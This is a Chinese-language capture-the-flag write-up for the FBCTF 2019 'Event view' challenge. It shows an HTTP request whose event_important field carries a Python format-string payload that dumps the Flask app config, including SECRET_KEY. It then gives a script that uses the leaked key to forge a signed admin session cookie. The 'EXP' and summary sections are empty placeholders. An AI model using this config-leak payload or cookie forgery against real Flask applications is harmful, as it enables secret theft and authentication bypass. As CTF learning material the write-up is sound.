Problem: [FBCTF 2019]Event view
思路
- 解题大致思路
发现admin用户无法注册,随便输入用户密码注册一个用户,
如bigwario/bigwario
点击Admin panel,提示
You do not seem to be an admin, bigwario!
构想是需要成为admin,查看cookie
{'user':'ImJpZ3dhcmlvIg.aNU28g.C-2Qfia0qlJxSoUUY9EDDZSjrSM'}
解密得到
python flask_session_cookie_manager3.py decode -c "ImJpZ3dhcmlvIg.aNU28g.C-2Qfia0qlJxSoUUY9EDDZSjrSM" # "bigwario"
直接构造不成功,需要修改签名,查看功能点发现event_important存在ssti漏洞
POST / HTTP/1.1 Host: node4.anna.nssctf.cn:28214 Content-Length: 89 Cache-Control: max-age=0 Origin: http://node4.anna.nssctf.cn:28214 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Sec-GPC: 1 Accept-Language: zh-CN,zh;q=0.5 Referer: http://node4.anna.nssctf.cn:28214/ Accept-Encoding: gzip, deflate, br Cookie: user=ImJpZ3dhcmlvIg.aNU28g.C-2Qfia0qlJxSoUUY9EDDZSjrSM; events_sesh_cookie=.eJwlzrsRwjAMANBdVKfQz5adZThZUg7ahFQcu1PwJngfeBxnXU_Y3-ddGzxeCTuYo5syz-BEbzpSgi2mIktIenVbModj6ODJzduojJYVTFOGrsLss4TIE4MyjNsUU1tYzQVHtxzuLhqH1NJsMpKo4zqEUAo2uK86_xmC7w9l0y6H.aNU28g.LkOjw1mcJlEL_ZpbN7kyWFOYmII Connection: keep-alive event_name=1&event_address=1&event_important=__class__.__init__.__globals__[app].config
得到配置文件和key
<Config {'ENV': 'production', 'DEBUG': False, 'TESTING': False, 'PROPAGATE_EXCEPTIONS': None, 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SECRET_KEY': 'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y', 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(days=31), 'USE_X_SENDFILE': False, 'SERVER_NAME': None, 'APPLICATION_ROOT': '/', 'SESSION_COOKIE_NAME': 'events_sesh_cookie', 'SESSION_COOKIE_DOMAIN': False, 'SESSION_COOKIE_PATH': None, 'SESSION_COOKIE_HTTPONLY': True, 'SESSION_COOKIE_SECURE': False, 'SESSION_COOKIE_SAMESITE': None, 'SESSION_REFRESH_EACH_REQUEST': True, 'MAX_CONTENT_LENGTH': None, 'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(seconds=43200), 'TRAP_BAD_REQUEST_ERRORS': None, 'TRAP_HTTP_EXCEPTIONS': False, 'EXPLAIN_TEMPLATE_LOADING': False, 'PREFERRED_URL_SCHEME': 'http', 'JSON_AS_ASCII': True, 'JSON_SORT_KEYS': True, 'JSONIFY_PRETTYPRINT_REGULAR': False, 'JSONIFY_MIMETYPE': 'application/json', 'TEMPLATES_AUTO_RELOAD': None, 'MAX_COOKIE_SIZE': 4093, 'SQLALCHEMY_DATABASE_URI': 'sqlite:///my.db', 'SQLALCHEMY_TRACK_MODIFICATIONS': False, 'SQLALCHEMY_BINDS': None, 'SQLALCHEMY_NATIVE_UNICODE': None, 'SQLALCHEMY_ECHO': False, 'SQLALCHEMY_RECORD_QUERIES': None, 'SQLALCHEMY_POOL_SIZE': None, 'SQLALCHEMY_POOL_TIMEOUT': None, 'SQLALCHEMY_POOL_RECYCLE': None, 'SQLALCHEMY_MAX_OVERFLOW': None, 'SQLALCHEMY_COMMIT_ON_TEARDOWN': False, 'SQLALCHEMY_ENGINE_OPTIONS': {}}>
构造admin的cookie,点击Admin panel后获得flag
from flask import Flask from flask.sessions import SecureCookieSessionInterface app = Flask(__name__) app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y' session_serializer = SecureCookieSessionInterface().get_signing_serializer(app) @app.route('/') def index(): print(session_serializer.dumps("admin")) index()
EXP
- 具体攻击代码
总结
- 对该题的考点总结
得亏有大佬